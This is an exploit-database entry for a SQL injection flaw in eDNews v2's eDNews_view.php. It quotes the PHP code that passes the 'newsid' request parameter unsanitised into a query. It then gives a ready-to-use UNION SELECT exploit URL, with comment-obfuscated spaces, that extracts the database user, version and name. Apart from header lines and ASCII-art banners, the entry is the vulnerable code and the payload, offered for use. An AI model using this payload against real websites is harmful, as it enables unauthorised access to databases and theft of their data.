eDNews v2 (eDNews_view.php newsid) SQL Injection Vulnerability

2008-12-29T00:00:00
ID 1337DAY-ID-4571
Type zdt
Reporter 0day Today Team
Modified 2008-12-29T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==============================================================
eDNews v2 (eDNews_view.php newsid) SQL Injection Vulnerability
==============================================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0                          
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1


-------
vuln code in eDNews_view.php:
line 22-23:
if ( isset( $_REQUEST['newsid'] ) ) {
 ${$CONFIG['fld_id']} = $_REQUEST['newsid'];
....
line 42-46:
$arr_select = array( $CONFIG['fld_id'], ''.$CONFIG['fld_title'].'', ''.$CONFIG['fld_content'].'',''.$CONFIG['fld_dateCreated'].'',''.$CONFIG['fld_score'] .'');
$arr_from = array($CONFIG['table']);
$where = $CONFIG['fld_id'].' = '.${$CONFIG['fld_id']};
$eDQuery_ = new edQuery( $dblink, $CONFIG['db'], $arr_from, $arr_select, $where, null, 'extended', $CONFIG['debug'], null, '1' );
$arr_rst = $eDQuery_->getRecords();
---
exploit:
http://site.com/eDNews_view.php?newsid=-99/**/union/**/select/**/1,2,concat(user(),0x3a,version(),0x3e,database()),4,5/*
-------



#  0day.today [2018-03-20]  #